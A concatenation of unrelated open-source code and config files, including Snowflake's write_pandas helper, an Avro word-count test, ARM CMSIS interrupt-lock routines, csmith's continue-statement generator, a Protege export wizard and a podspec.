            "Schema has to be provided to write_pandas when a database is provided"
        )
    # This dictionary maps the compression algorithm to Snowflake put copy into command type
    # https://docs.snowflake.com/en/sql-reference/sql/copy-into-table.html#type-parquet
    compression_map = {"gzip": "auto", "snappy": "snappy"}
    if compression not in compression_map.keys():
        raise ProgrammingError(
            "Invalid compression '{}', only acceptable values are: {}".format(
                compression, compression_map.keys()
            )
        )
    # Build the fully qualified (and optionally quoted) target table location.
    if quote_identifiers:
        location = (
            (('"' + database + '".') if database else "")
            + (('"' + schema + '".') if schema else "")
            + ('"' + table_name + '"')
        )
    else:
        location = (
            (database + "." if database else "")
            + (schema + "." if schema else "")
            + (table_name)
        )
    if chunk_size is None:
        chunk_size = len(df)
    cursor = conn.cursor()
    stage_name = None  # Forward declaration
    # Create a temporary stage with a random 5-letter name, retrying on the
    # (unlikely) name collision reported as an "already exists." error.
    while True:
        try:
            stage_name = "".join(
                random.choice(string.ascii_lowercase) for _ in range(5)
            )
            create_stage_sql = (
                "create temporary stage /* Python:snowflake.connector.pandas_tools.write_pandas() */ "
                '"{stage_name}"'
            ).format(stage_name=stage_name)
            logger.debug("creating stage with '{}'".format(create_stage_sql))
            cursor.execute(create_stage_sql, _is_internal=True).fetchall()
            break
        except ProgrammingError as pe:
            if pe.msg.endswith("already exists."):
                continue
            raise
    # Dump each row-chunk of the DataFrame to a local Parquet file, PUT it
    # onto the stage, then delete the local file.
    # NOTE(review): the temp files hold Parquet data despite the .txt suffix.
    with TemporaryDirectory() as tmp_folder:
        for i, chunk in chunk_helper(df, chunk_size):
            chunk_path = os.path.join(tmp_folder, "file{}.txt".format(i))
            # Dump chunk into parquet file
            chunk.to_parquet(chunk_path, compression=compression)
            # Upload parquet file
            upload_sql = (
                "PUT /* Python:snowflake.connector.pandas_tools.write_pandas() */ "
                "'file://{path}' @\"{stage_name}\" PARALLEL={parallel}"
            ).format(
                path=chunk_path.replace("\\", "\\\\").replace("'", "\\'"),
                stage_name=stage_name,
                parallel=parallel,
            )
            logger.debug("uploading files with '{}'".format(upload_sql))
            cursor.execute(upload_sql, _is_internal=True)
            # Remove chunk file
            os.remove(chunk_path)
    if quote_identifiers:
        columns = '"' + '","'.join(list(df.columns)) + '"'
    else:
        columns = ",".join(list(df.columns))
    # in Snowflake, all parquet data is stored in a single column, $1, so we must select columns explicitly
    # see (https://docs.snowflake.com/en/user-guide/script-data-load-transform-parquet.html)
    if quote_identifiers:
        parquet_columns = "$1:" + ",$1:".join(f'"{c}"' for c in df.columns)
    else:
        parquet_columns = "$1:" + ",$1:".join(df.columns)
    # Copy the staged files into the target table; PURGE=TRUE removes the
    # staged files after a successful load.
    copy_into_sql = (
        "COPY INTO {location} /* Python:snowflake.connector.pandas_tools.write_pandas() */ "
        "({columns}) "
        'FROM (SELECT {parquet_columns} FROM @"{stage_name}") '
        "FILE_FORMAT=(TYPE=PARQUET COMPRESSION={compression}) "
        "PURGE=TRUE ON_ERROR={on_error}"
    ).format(
        location=location,
        columns=columns,
        parquet_columns=parquet_columns,
        stage_name=stage_name,
        compression=compression_map[compression],
        on_error=on_error,
    )
    logger.debug("copying into with '{}'".format(copy_into_sql))
    copy_results = cursor.execute(copy_into_sql, _is_internal=True).fetchall()
    cursor.close()
    # (all chunks LOADED?, number of chunks, total rows loaded, raw COPY results)
    return (
        all(e[1] == "LOADED" for e in copy_results),
        len(copy_results),
        sum(int(e[3]) for e in copy_results),
        copy_results,
    )
def make_pd_writer(
    quote_identifiers: bool = True,
) -> Callable[
    [
        "pandas.io.sql.SQLTable",
        Union["sqlalchemy.engine.Engine", "sqlalchemy.engine.Connection"],
        Iterable,
        Iterable,
    ],
    None,
]:
    """This returns a pd_writer with the desired arguments.

    The returned callable matches the signature pandas expects for the
    ``method`` argument of ``DataFrame.to_sql``.

        Example usage:
            import pandas as pd
            from snowflake.connector.pandas_tools import pd_writer

            sf_connector_version_df = pd.DataFrame([('snowflake-connector-python', '1.0')], columns=['NAME', 'NEWEST_VERSION'])
            sf_connector_version_df.to_sql('driver_versions', engine, index=False, method=make_pd_writer())

            # to use quote_identifiers=False,
            from functools import partial
            sf_connector_version_df.to_sql(
                'driver_versions', engine, index=False, method=make_pd_writer(quote_identifiers=False)))

    Args:
        quote_identifiers: if True (default), the pd_writer will pass quote identifiers to Snowflake.
            If False, the created pd_writer will not quote identifiers (and typically coerced to uppercase by Snowflake)
    """
    # Bind the flag now; pandas supplies the remaining four arguments later.
    return partial(pd_writer, quote_identifiers=quote_identifiers)
def pd_writer(
    table: "pandas.io.sql.SQLTable",
    conn: Union["sqlalchemy.engine.Engine", "sqlalchemy.engine.Connection"],
    keys: Iterable,
    data_iter: Iterable,
    quote_identifiers: bool = True,
) -> None:
    """This is a wrapper on top of write_pandas to make it compatible with to_sql method in pandas.

        Example usage:
            import pandas as pd
            from snowflake.connector.pandas_tools import pd_writer

            sf_connector_version_df = pd.DataFrame([('snowflake-connector-python', '1.0')], columns=['NAME', 'NEWEST_VERSION'])
            sf_connector_version_df.to_sql('driver_versions', engine, index=False, method=pd_writer)

            # to use quote_identifiers=False, see `make_pd_writer`

    Args:
        table: Pandas package's table object.
        conn: SQLAlchemy engine object to talk to Snowflake.
        keys: Column names that we are trying to insert.
        data_iter: Iterator over the rows.
        quote_identifiers: if True (default), quote identifiers passed to Snowflake. If False, identifiers are not
            quoted (and typically coerced to uppercase by Snowflake)
    """
    # Unwrap the raw Snowflake DBAPI connection from SQLAlchemy's pooled wrapper.
    sf_connection = conn.connection.connection
    # Materialize the row iterator into a DataFrame that write_pandas can dump.
    df = pandas.DataFrame(data_iter, columns=keys)
    write_pandas(
        conn=sf_connection,
        df=df,
        # Note: Our sqlalchemy connector creates tables case insensitively
        table_name=table.name.upper(),
        schema=table.schema,
        quote_identifiers=quote_identifiers,
    )
| 4,484 |
1,960 | <filename>lang/java/mapred/src/test/java/org/apache/avro/mapred/TestWordCount.java
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.avro.mapred;
import static org.junit.Assert.assertEquals;
import java.io.File;
import java.io.IOException;
import java.util.StringTokenizer;
import org.apache.avro.Schema;
import org.apache.avro.util.Utf8;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.NullWritable;
import org.apache.hadoop.mapred.FileInputFormat;
import org.apache.hadoop.mapred.FileOutputFormat;
import org.apache.hadoop.mapred.FileSplit;
import org.apache.hadoop.mapred.JobClient;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hadoop.mapred.Reporter;
import org.junit.ClassRule;
import org.junit.Test;
import org.junit.rules.TemporaryFolder;
/**
 * End-to-end MapReduce word-count test over Avro files, followed by a
 * schema-projection read of the job's output.
 */
public class TestWordCount {

  @ClassRule
  public static TemporaryFolder INPUT_DIR = new TemporaryFolder();

  @ClassRule
  public static TemporaryFolder OUTPUT_DIR = new TemporaryFolder();

  /** Mapper: emits (word, 1) for every whitespace-separated token of a line. */
  public static class MapImpl extends AvroMapper<Utf8, Pair<Utf8, Long>> {
    @Override
    public void map(Utf8 text, AvroCollector<Pair<Utf8, Long>> collector, Reporter reporter) throws IOException {
      StringTokenizer tokens = new StringTokenizer(text.toString());
      while (tokens.hasMoreTokens())
        collector.collect(new Pair<>(new Utf8(tokens.nextToken()), 1L));
    }
  }

  /** Reducer (also used as combiner): sums the counts for each word. */
  public static class ReduceImpl extends AvroReducer<Utf8, Long, Pair<Utf8, Long>> {
    @Override
    public void reduce(Utf8 word, Iterable<Long> counts, AvroCollector<Pair<Utf8, Long>> collector, Reporter reporter)
        throws IOException {
      long sum = 0;
      for (long count : counts)
        sum += count;
      collector.collect(new Pair<>(word, sum));
    }
  }

  @Test
  public void runTestsInOrder() throws Exception {
    // testProjection reads the output produced by testJob, so the order
    // of these calls matters.
    String pathOut = OUTPUT_DIR.getRoot().getPath();
    testJob(pathOut);
    testProjection(pathOut);
  }

  /** Runs the word-count job and validates the counts in its output file. */
  @SuppressWarnings("deprecation")
  public void testJob(String pathOut) throws Exception {
    JobConf job = new JobConf();
    String pathIn = INPUT_DIR.getRoot().getPath();

    WordCountUtil.writeLinesFile(pathIn + "/lines.avro");

    Path outputPath = new Path(pathOut);
    outputPath.getFileSystem(job).delete(outputPath);

    job.setJobName("wordcount");
    AvroJob.setInputSchema(job, Schema.create(Schema.Type.STRING));
    AvroJob.setOutputSchema(job, new Pair<Utf8, Long>(new Utf8(""), 0L).getSchema());

    AvroJob.setMapperClass(job, MapImpl.class);
    AvroJob.setCombinerClass(job, ReduceImpl.class);
    AvroJob.setReducerClass(job, ReduceImpl.class);

    FileInputFormat.setInputPaths(job, new Path(pathIn));
    FileOutputFormat.setOutputPath(job, new Path(pathOut));
    FileOutputFormat.setCompressOutput(job, true);

    WordCountUtil.setMeta(job);

    JobClient.runJob(job);

    WordCountUtil.validateCountsFile(new File(pathOut, "part-00000.avro"));
  }

  /**
   * Re-reads the job output with a reader schema that declares a "rank"
   * field absent from the writer schema: Avro schema resolution fills it
   * with its default (-1), while "value" resolves to the written count.
   */
  @SuppressWarnings("deprecation")
  public void testProjection(String inputPathString) throws Exception {
    JobConf job = new JobConf();

    Integer defaultRank = -1;

    String jsonSchema = "{\"type\":\"record\"," + "\"name\":\"org.apache.avro.mapred.Pair\"," + "\"fields\": [ "
        + "{\"name\":\"rank\", \"type\":\"int\", \"default\": -1}," + "{\"name\":\"value\", \"type\":\"long\"}" + "]}";

    Schema readerSchema = Schema.parse(jsonSchema);

    AvroJob.setInputSchema(job, readerSchema);

    Path inputPath = new Path(inputPathString + "/part-00000.avro");
    FileStatus fileStatus = FileSystem.get(job).getFileStatus(inputPath);
    FileSplit fileSplit = new FileSplit(inputPath, 0, fileStatus.getLen(), job);

    AvroRecordReader<Pair<Integer, Long>> recordReader = new AvroRecordReader<>(job, fileSplit);

    AvroWrapper<Pair<Integer, Long>> inputPair = new AvroWrapper<>(null);
    NullWritable ignore = NullWritable.get();

    long sumOfCounts = 0;
    long numOfCounts = 0;
    while (recordReader.next(inputPair, ignore)) {
      assertEquals(inputPair.datum().get(0), defaultRank);
      sumOfCounts += (Long) inputPair.datum().get(1);
      numOfCounts++;
    }

    assertEquals(numOfCounts, WordCountUtil.COUNTS.size());

    long actualSumOfCounts = 0;
    for (Long count : WordCountUtil.COUNTS.values()) {
      actualSumOfCounts += count;
    }

    assertEquals(sumOfCounts, actualSumOfCounts);
  }
}
| 1,806 |
4,538 | <filename>hardware/chip/haas1000/drivers/platform/cmsis/inc/cmsis.h
/* mbed Microcontroller Library - CMSIS
* Copyright (C) 2009-2011 ARM Limited. All rights reserved.
*
* A generic CMSIS include header, pulling in LPC11U24 specifics
*/
#ifndef MBED_CMSIS_H
#define MBED_CMSIS_H
#ifdef __cplusplus
extern "C" {
#endif
#include "plat_addr_map.h"
#include _TO_STRING(CONCAT_SUFFIX(CHIP_ID_LITERAL, h))
#define IRQ_PRIORITY_REALTIME 0
#define IRQ_PRIORITY_HIGHPLUSPLUS 1
#define IRQ_PRIORITY_HIGHPLUS 2
#define IRQ_PRIORITY_HIGH 3
#define IRQ_PRIORITY_ABOVENORMAL 4
#define IRQ_PRIORITY_NORMAL 5
#define IRQ_PRIORITY_BELOWNORMAL 6
#define IRQ_PRIORITY_LOW 7
#ifdef __ARM_ARCH_ISA_ARM
#define IRQ_LOCK_MASK (CPSR_I_Msk | CPSR_F_Msk)
#else
#define NVIC_USER_IRQ_OFFSET 16
#define NVIC_NUM_VECTORS (NVIC_USER_IRQ_OFFSET + USER_IRQn_QTY)
#endif
#ifndef __ASSEMBLER__
#ifdef __ARMCC_VERSION
// Stupid armclang
#undef __SSAT
#define __SSAT(ARG1,ARG2) \
__extension__ \
({ \
int32_t __RES, __ARG1 = (ARG1); \
__ASM ("ssat %0, %1, %2" : "=r" (__RES) : "I" (ARG2), "r" (__ARG1) ); \
__RES; \
})
#endif
/* Disable interrupts globally and return the previous mask state, which
 * must be passed back to int_unlock_global() to restore it. */
__STATIC_FORCEINLINE uint32_t int_lock_global(void)
{
#ifdef __ARM_ARCH_ISA_ARM
    /* A-profile: mask both IRQ and FIQ bits in CPSR (IRQ_LOCK_MASK). */
    uint32_t cpsr = __get_CPSR();
    uint32_t st = cpsr & IRQ_LOCK_MASK;
    if (st != IRQ_LOCK_MASK) {
        cpsr |= IRQ_LOCK_MASK;
        __set_CPSR(cpsr);
    }
    return st;
#else
    /* M-profile: disable interrupts via PRIMASK. */
    uint32_t pri = __get_PRIMASK();
    if ((pri & 0x1) == 0) {
        __disable_irq();
    }
    return pri;
#endif
}
/*
 * Restore the interrupt state previously returned by int_lock_global().
 * Interrupts are re-enabled only if they were enabled at lock time.
 */
__STATIC_FORCEINLINE void int_unlock_global(uint32_t pri)
{
#ifdef __ARM_ARCH_ISA_ARM
    if (pri != IRQ_LOCK_MASK) {
        uint32_t cpsr = __get_CPSR();
        cpsr = (cpsr & ~IRQ_LOCK_MASK) | pri;
        __set_CPSR(cpsr);
    }
#else
    if ((pri & 0x1) == 0) {
        __enable_irq();
    }
#endif
}
#if defined(RTOS) && defined(__ARM_ARCH_ISA_ARM)
extern uint32_t int_lock(void);
extern void int_unlock(uint32_t pri);
#else
/*
 * Acquire the interrupt lock and return the previous mask for int_unlock().
 * With INT_LOCK_EXCEPTION defined this is a priority-based lock that still
 * admits the two most urgent levels; otherwise it is a full global lock.
 */
__STATIC_FORCEINLINE uint32_t int_lock(void)
{
#ifdef INT_LOCK_EXCEPTION
#ifdef __ARM_ARCH_ISA_ARM
    uint32_t mask = GIC_GetInterfacePriorityMask();
    // Only allow IRQs with priority IRQ_PRIORITY_HIGHPLUSPLUS and IRQ_PRIORITY_REALTIME
    GIC_SetInterfacePriorityMask(((IRQ_PRIORITY_HIGHPLUS << (8 - __NVIC_PRIO_BITS)) & (uint32_t)0xFFUL));
    return mask;
#else
    uint32_t pri = __get_BASEPRI();
    // Only allow IRQs with priority IRQ_PRIORITY_HIGHPLUSPLUS and IRQ_PRIORITY_REALTIME
    __set_BASEPRI(((IRQ_PRIORITY_HIGHPLUS << (8 - __NVIC_PRIO_BITS)) & (uint32_t)0xFFUL));
    return pri;
#endif
#else
    return int_lock_global();
#endif
}
/*
 * Release the lock taken by int_lock(), restoring the saved priority mask
 * (or the saved global interrupt state when INT_LOCK_EXCEPTION is off).
 */
__STATIC_FORCEINLINE void int_unlock(uint32_t pri)
{
#ifdef INT_LOCK_EXCEPTION
#ifdef __ARM_ARCH_ISA_ARM
    GIC_SetInterfacePriorityMask(pri);
#else
    __set_BASEPRI(pri);
#endif
#else
    int_unlock_global(pri);
#endif
}
#endif
/*
 * Return non-zero when executing in interrupt/exception context.
 * Delegates to the RTOS when one provides the information.
 */
__STATIC_FORCEINLINE int in_isr(void)
{
#ifdef __ARM_ARCH_ISA_ARM
#ifdef KERNEL_RHINO
    extern int rhino_in_isr(void);
    return rhino_in_isr();
#else
    /* A-profile: any mode other than USR/SYS is an exception mode. */
    uint32_t mode = __get_mode();
    return mode != CPSR_M_USR && mode != CPSR_M_SYS;
#endif
#else
#ifdef KERNEL_FREERTOS
    extern int osIsIRQ();
    return osIsIRQ();
#else
    /* M-profile: IPSR is non-zero while an exception is active. */
    return __get_IPSR() != 0;
#endif
#endif
}
/* Round a float to the nearest integer, halves rounded away from zero. */
__STATIC_FORCEINLINE int32_t ftoi_nearest(float f)
{
    if (f >= 0) {
        return (int32_t)(f + 0.5);
    }
    return (int32_t)(f - 0.5);
}
void GotBaseInit(void);
int set_bool_flag(bool *flag);
void clear_bool_flag(bool *flag);
float db_to_float(int32_t db);
uint32_t get_msb_pos(uint32_t val);
uint32_t get_lsb_pos(uint32_t val);
#endif
#ifdef __cplusplus
}
#endif
#endif
| 1,874 |
660 | // -*- mode: C++ -*-
//
// Copyright (c) 2007, 2008, 2009, 2010, 2011, 2015, 2017 The University of Utah
// All rights reserved.
//
// This file is part of `csmith', a random generator of C programs.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
#if HAVE_CONFIG_H
# include <config.h>
#endif
#ifdef WIN32
#pragma warning(disable : 4786) /* Disable annoying warning messages */
#endif
#include "StatementContinue.h"
#include <iostream>
#include <cassert>
#include "CGOptions.h"
#include "CGContext.h"
#include "Block.h"
#include "Type.h"
#include "Function.h"
#include "Expression.h"
#include "FactMgr.h"
#include "Bookkeeper.h"
#include "Error.h"
using namespace std;
///////////////////////////////////////////////////////////////////////////////
/*
*
*/
/*
 * Randomly create a guarded "continue" for the current generation context.
 * Returns NULL when "continue" would be the first statement of the block
 * (disallowed) or when guard-expression generation fails (ERROR_GUARD).
 */
StatementContinue *
StatementContinue::make_random(CGContext &cg_context)
{
	//static int g =0;
	FactMgr* fm = get_fact_mgr(&cg_context);
	// find the closest looping parent block: the one "continue"
	// would apply to
	//int h = g++;
	const Block* b = cg_context.get_current_block();
	const Statement* prev_stm = b->get_last_stm();
	// don't generate "continue" as the first statement in a block
	if (prev_stm == 0) {
		return 0;
	}
	// walk up to the nearest enclosing loop; the assert below requires
	// that the caller only invokes this inside a loop
	while (b && !b->looping) {
		b = b->parent;
	}
	assert(b);
	// reset the per-statement effect before generating the guard expression
	cg_context.get_effect_stm().clear();
	Expression *expr = Expression::make_random(cg_context, get_int_type(), 0, true, true, eVariable);
	ERROR_GUARD(NULL);
	StatementContinue* sc = new StatementContinue(cg_context.get_current_block(), *expr, *b);
	// record the control-flow edge from this statement back to the loop block
	fm->create_cfg_edge(sc, b, false, true);
	return sc;
}
/*
*
*/
/*
 * Construct a guarded continue ("if (test) continue;") whose target loop
 * is block b. Takes ownership of test (deleted in the destructor).
 */
StatementContinue::StatementContinue(Block* parent, const Expression &test, const Block &b)
	: Statement(eContinue, parent),
	  test(test),
	  loop_blk(b)
{
	// Nothing else to do.
}
/*
*
*/
/*
 * Copy constructor.
 * NOTE(review): the copy shares the same guard Expression reference as the
 * source, and the destructor does "delete &test" - destroying both objects
 * would double-free the expression. Confirm how copies are used.
 */
StatementContinue::StatementContinue(const StatementContinue &sc)
	: Statement(sc.get_type(), sc.parent),
	  test(sc.test),
	  loop_blk(sc.loop_blk)
{
	// Nothing else to do.
}
/*
*
*/
/*
 * Destructor: the statement owns its guard expression.
 */
StatementContinue::~StatementContinue(void)
{
	delete &test;
}
/*
* return true if condition is always true
*/
/*
 * Return true when the guard is known to be non-zero (test.not_equals(0)),
 * i.e. the continue is always taken.
 */
bool
StatementContinue::must_jump(void) const
{
	return test.not_equals(0);
}
/*
*
*/
/*
 * Emit the statement as:
 *     if (<test>)
 *         continue;
 */
void
StatementContinue::Output(std::ostream &out, FactMgr* /*fm*/, int indent) const
{
	output_tab(out, indent);
	out << "if (";
	test.Output(out);
	out << ")";
	outputln(out);
	// the continue body is indented one level deeper than the if
	output_tab(out, indent+1);
	out << "continue;";
	outputln(out);
}
/*
 * Dataflow hook: propagate facts through the guard expression, then record
 * this statement's accumulated effect in the fact manager.
 */
bool
StatementContinue::visit_facts(vector<const Fact*>& inputs, CGContext& cg_context) const
{
	// evaluate condition first
	if (!test.visit_facts(inputs, cg_context)) {
		return log_analysis_fail("StatementContinue");
	}
	FactMgr* fm = get_fact_mgr(&cg_context);
	fm->map_stm_effect[this] = cg_context.get_effect_stm();
	return true;
}
///////////////////////////////////////////////////////////////////////////////
// Local Variables:
// c-basic-offset: 4
// tab-width: 4
// End:
// End of file.
| 1,398 |
5,169 | {
"name": "KLProgressHUD",
"version": "1.0.0",
"platforms": {
"ios": "10.0"
},
"license": {
"type": "MIT",
"file": "LICENSE"
},
"summary": "swift 编写带有进度条显示的HUD。",
"homepage": "https://github.com/KYangLei/KLProgressHUD.git",
"authors": {
"KYangLei": "<EMAIL>"
},
"source": {
"git": "https://github.com/KYangLei/KLProgressHUD.git",
"tag": "1.0.0"
},
"description": "KLProgressHUD 是一个在 iOS App 上极易于使用的 HUD。主要用于显示加载、进度、情景信息、Toast。",
"source_files": "KLProgressHUD/*.swift",
"resources": "KLProgressHUD/KLProgressHUD.bundle",
"requires_arc": true,
"frameworks": [
"Foundation",
"UIKit"
],
"pod_target_xcconfig": {
"SWIFT_VERSION": "3.0"
},
"pushed_with_swift_version": "4.0"
}
| 403 |
746 | package org.protege.editor.owl.ui.action.export.inferred;
import org.protege.editor.core.ui.wizard.Wizard;
import org.protege.editor.owl.OWLEditorKit;
import org.protege.editor.owl.ui.action.OntologyFormatPage;
import org.protege.editor.owl.ui.ontology.wizard.create.OntologyIDPanel;
import org.protege.editor.owl.ui.ontology.wizard.create.PhysicalLocationPanel;
import org.semanticweb.owlapi.model.OWLAxiom;
import org.semanticweb.owlapi.model.OWLDocumentFormat;
import org.semanticweb.owlapi.model.OWLOntologyID;
import org.semanticweb.owlapi.util.InferredAxiomGenerator;
import java.net.URI;
import java.util.List;
/*
* Copyright (C) 2007, University of Manchester
*
*
*/
/**
* Author: <NAME><br>
* The University Of Manchester<br>
* Bio-Health Informatics Group<br>
* Date: 09-Aug-2007<br><br>
*/
public class ExportInferredOntologyWizard extends Wizard {
    // Wizard pages, registered in the constructor and queried via the getters below.
    private ExportInferredOntologyWizardSelectAxiomsPanel axiomsPanel;
    private ExportInferredOntologyIDPanel ontologyIRIPanel;
    private PhysicalLocationPanel locationPanel;
    private ExportInferredOntologyIncludeAssertedAxiomsPanel assertedAxiomsPanel;
    private OntologyFormatPage ontologyFormatPanel;
    /**
     * Builds the wizard page sequence: axiom-generator selection,
     * asserted-axiom options, ontology ID, save location and document format.
     */
    public ExportInferredOntologyWizard(OWLEditorKit editorKit) {
        setTitle("Export inferred axioms as ontology");
        registerWizardPanel(ExportInferredOntologyWizardSelectAxiomsPanel.ID,
                            axiomsPanel = new ExportInferredOntologyWizardSelectAxiomsPanel(editorKit));
        // the axiom-selection page is shown first
        setCurrentPanel(ExportInferredOntologyWizardSelectAxiomsPanel.ID);
        registerWizardPanel(ExportInferredOntologyIncludeAssertedAxiomsPanel.ID,
                            assertedAxiomsPanel = new ExportInferredOntologyIncludeAssertedAxiomsPanel(editorKit));
        registerWizardPanel(OntologyIDPanel.ID, ontologyIRIPanel = new ExportInferredOntologyIDPanel(editorKit));
        registerWizardPanel(PhysicalLocationPanel.ID, locationPanel = new PhysicalLocationPanel(editorKit));
        registerWizardPanel(OntologyFormatPage.ID, ontologyFormatPanel = new OntologyFormatPage(editorKit));
    }
    /** @return the inferred-axiom generators chosen on the selection page */
    public List<InferredAxiomGenerator<? extends OWLAxiom>> getInferredAxiomGenerators() {
        return axiomsPanel.getInferredAxiomGenerators();
    }
    /** @return the ID entered for the exported ontology */
    public OWLOntologyID getOntologyID() {
        return ontologyIRIPanel.getOntologyID();
    }
    /** @return the physical location the ontology will be saved to */
    public URI getPhysicalURL() {
        return locationPanel.getLocationURL();
    }
    /** @return whether annotation axioms should be included in the export */
    public boolean isIncludeAnnotations() {
        return assertedAxiomsPanel.isIncludeAnnotationAxioms();
    }
    /** @return whether asserted logical axioms should be included in the export */
    public boolean isIncludeAssertedLogicalAxioms() {
        return assertedAxiomsPanel.isIncludeAssertedLogicalAxioms();
    }
    /** @return the document format selected for saving */
    public OWLDocumentFormat getFormat() {
        return ontologyFormatPanel.getFormat();
    }
}
| 1,003 |
534 | {
"type": "mekanism:crystallizing",
"chemicalType": "slurry",
"input": {
"amount": 200,
"slurry": "mekanism:clean_gold"
},
"output": {
"item": "mekanism:crystal_gold"
}
} | 88 |
831 | /*
* Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.tools.idea.uibuilder.api;
import com.android.tools.idea.common.model.NlComponent;
import com.android.tools.idea.uibuilder.surface.AccessoryPanel;
import org.jetbrains.annotations.NotNull;
import javax.swing.*;
import java.util.List;
import org.jetbrains.annotations.Nullable;
/**
* This is the interface to Accessory Panels they are returned by ViewGroupHandlers if they want to have a panel on the bottom of the design
* surface.
* It is used by the motionLayout handler to display the timeline.
*/
public interface AccessoryPanelInterface {
  /**
   * The panel to be put onto the user interface.
   *
   * @return the panel component; never null
   */
  @NotNull JPanel getPanel();
  /**
   * Creates the panel backing the given accessory panel type.
   *
   * @param type the kind of accessory panel to create
   * @return the newly created panel; never null
   */
  @NotNull JPanel createPanel(AccessoryPanel.Type type);
  /**
   * Give a chance for the handler to populate the accessory panel
   *
   * @param type type of accessory panel
   * @param selection the current selected components
   */
  void updateAccessoryPanelWithSelection(@NotNull AccessoryPanel.Type type,
                                         @NotNull List<NlComponent> selection);
  /**
   * Called to inform the Panel that it is no longer in use.
   */
  void deactivate();
  /**
   * The accessory panel should send the current selection to its listeners.
   */
  void requestSelection();
  /**
   * Refresh hook invoked after the model's derived data has been recomputed.
   */
  void updateAfterModelDerivedDataChanged();
  /** Registers a listener for selection changes published by this panel. */
  void addListener(@NotNull AccessorySelectionListener listener);
  /** Unregisters a previously added selection listener. */
  void removeListener(@NotNull AccessorySelectionListener listener);
}
| 610 |
363 | package com.xunlei.downloadlib.parameter;
/**
 * Parameter bag describing a server-side download resource handed to the
 * download library. Fields are public and mutable, mirroring the original
 * JavaBean-with-public-fields style expected by existing callers.
 */
public class ServerResourceParam {
    /** Cookie string sent with the resource request. */
    public String mCookie;
    /** Referer URL for the resource. */
    public String mRefUrl;
    /** Resource type code (semantics defined by the native library). */
    public int mResType;
    /** Dispatch strategy code (semantics defined by the native library). */
    public int mStrategy;
    /** Resource URL. */
    public String mUrl;
    /**
     * @param str  resource URL
     * @param str2 referer URL
     * @param str3 cookie string
     * @param i    resource type code
     * @param i2   strategy code
     */
    public ServerResourceParam(String str, String str2, String str3, int i, int i2) {
        this.mUrl = str;
        this.mRefUrl = str2;
        this.mCookie = str3;
        this.mResType = i;
        this.mStrategy = i2;
    }
    public void setUrl(String str) {
        this.mUrl = str;
    }
    public void setRefUrl(String str) {
        this.mRefUrl = str;
    }
    public void setCookie(String str) {
        this.mCookie = str;
    }
    public void setRestype(int i) {
        this.mResType = i;
    }
    public void setStrategy(int i) {
        this.mStrategy = i;
    }
    /**
     * Validates that all mandatory string members are present.
     *
     * @return {@code true} when url, referer url and cookie are all non-null
     */
    public boolean checkMemberVar() {
        // Simplified from the original if/return chain; same truth table.
        return mUrl != null && mRefUrl != null && mCookie != null;
    }
}
| 447 |
1,178 | /*
* Definitions for talking to the CUDA. The CUDA is a microcontroller
* which controls the ADB, system power, RTC, and various other things.
*
* Copyright (C) 1996 <NAME>.
*/
#ifndef _LINUX_CUDA_H
#define _LINUX_CUDA_H
/* CUDA commands (2nd byte) */
#define CUDA_WARM_START 0
#define CUDA_AUTOPOLL 1
#define CUDA_GET_6805_ADDR 2
#define CUDA_GET_TIME 3
#define CUDA_GET_PRAM 7
#define CUDA_SET_6805_ADDR 8
#define CUDA_SET_TIME 9
#define CUDA_POWERDOWN 0xa
#define CUDA_POWERUP_TIME 0xb
#define CUDA_SET_PRAM 0xc
#define CUDA_MS_RESET 0xd
#define CUDA_SEND_DFAC 0xe
#define CUDA_RESET_SYSTEM 0x11
#define CUDA_SET_IPL 0x12
#define CUDA_SET_AUTO_RATE 0x14
#define CUDA_GET_AUTO_RATE 0x16
#define CUDA_SET_DEVICE_LIST 0x19
#define CUDA_GET_DEVICE_LIST 0x1a
#define CUDA_GET_SET_IIC 0x22
#endif /* _LINUX_CUDA_H */
| 381 |
354 | <filename>framework/delibs/destream/deInStream.h
#ifndef _DEINSTREAM_H
#define _DEINSTREAM_H
/*-------------------------------------------------------------------------
* drawElements Stream Library
* ---------------------------
*
* Copyright 2014 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
